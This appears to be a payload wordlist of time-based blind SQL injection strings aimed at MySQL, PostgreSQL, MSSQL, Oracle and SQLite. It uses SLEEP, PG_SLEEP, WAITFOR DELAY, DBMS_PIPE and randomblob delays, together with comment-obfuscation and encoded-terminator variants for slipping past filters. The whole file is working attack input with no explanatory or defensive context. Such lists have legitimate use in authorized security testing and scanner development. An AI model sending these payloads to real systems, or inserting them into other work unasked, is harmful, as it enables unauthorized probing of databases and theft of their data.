1'/**/AND/**/1=1--
1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
1' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) #
1' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
1'/**/AND/**/DBMS_PIPE.RECEIVE_MESSAGE('a',5)/**/--
1' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM DUAL --
1' AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(100000000/2)))) --
1' AND PG_SLEEP(5)--
1' AND randomblob(1000000000) --
1' AND randomblob(500000000) #
1' AND randomblob(500000000) --
1' AND (SELECT PG_SLEEP(5)) IS NULL --
1" AND SLEEP(5) --
1' AND SLEEP(5) --
1'/**/AND/**/SLEEP(5)--
1' AND SLEEP(5) AND '1'='1
1'; IF (1=1) WAITFOR DELAY '0:0:5' --
1'; IF(1=1) WAITFOR DELAY '0:0:5' --
1'; IF (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '0:0:5' --
1'/**/OR/**/1=1--
1' OR 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
1' OR 1=SLEEP(5) --
1' OR 1=SLEEP(5) AND '1'='1
1' OR BENCHMARK(5000000, MD5('test')) #
1' OR BENCHMARK(5000000, MD5('test')) --
1' OR DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
1' OR DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
1' OR PG_SLEEP(5)--
1'/**/OR/**/PG_SLEEP(5)--
1' OR randomblob(500000000) --
1' OR (SELECT PG_SLEEP(5)) #
1' OR (SELECT PG_SLEEP(5)) --
1' OR (SELECT SLEEP(5)) #
1' OR (SELECT SLEEP(5)) --
1' OR (SELECT(SLEEP(5))) --
1'/**/OR/**/(SELECT/**/SLEEP(5))--
1' OR SLEEP(5) #
1' OR SLEEP(5) --
1' OR SLEEP(5)#
1' OR SLEEP(5)--
1' OR SLEEP(5)/*
1' OR SLEEP(5);--
1' OR SLEEP/**/(5) --
1'/**/OR/**/SLEEP(5)--
1' OR SLEEP(5)%23
1' OR SLEEP(5) AND '1'='1
1' OR SLEEP(5) GROUP BY 1 --
1' OR SLEEP(5) OR '1'='1
1' OR SLEEP(5) ORDER BY 1 --
1'; SELECT%0APG_SLEEP(5) --
1' ; SELECT PG_SLEEP(5) #
1' ; SELECT PG_SLEEP(5)--
1'; SELECT PG_SLEEP (5) --
1'; SELECT PG_SLEEP(5) #
1'; SELECT PG_SLEEP(5) --
1'; SELECT PG_SLEEP(5)--
1'; SELECT PG_SLEEP(5)/*
1'; SELECT PG_SLEEP(5);--
1'; SELECT/**/PG_SLEEP(5) --
1';SELECT PG_SLEEP(5) --
1';SELECT PG_SLEEP(5)--
1'; SELECT PG_SLEEP(5::int) --
1'; SELECT (SELECT PG_SLEEP(5)) --
1'; SELECT (SELECT SLEEP(5)) --
1'; SELECT SLEEP(5) --
1'/**/UNION/**/SELECT/**/1,2,3--
1'; WAITFOR%0ADELAY '0:0:5' --
1'; WAITFOR DELAY '00:00:05' --
1"; WAITFOR DELAY '0:0:5' --
1'/**/;/**/WAITFOR/**/DELAY/**/'0:0:5'/**/--
1'; WAITFOR DELAY '0:0:5' #
1'; WAITFOR DELAY '0:0:5' + '--'
1'; WAITFOR DELAY '0:0:5' --
1'; WAITFOR DELAY '0:0:5'--
1'; WAITFOR DELAY '0:0:5'/*
1'; WAITFOR DELAY '0:0:5';--
1'; WAITFOR DELAY'0:0:5' --
1'; WAITFOR/**/DELAY '0:0:5' --
1';WAITFOR DELAY '0:0:5' --
1';WAITFOR DELAY'0:0:5'--
1'; WAITFOR DELAY '0:0:5'%00
" OR SLEEP(5) --
' OR SLEEP(5) --
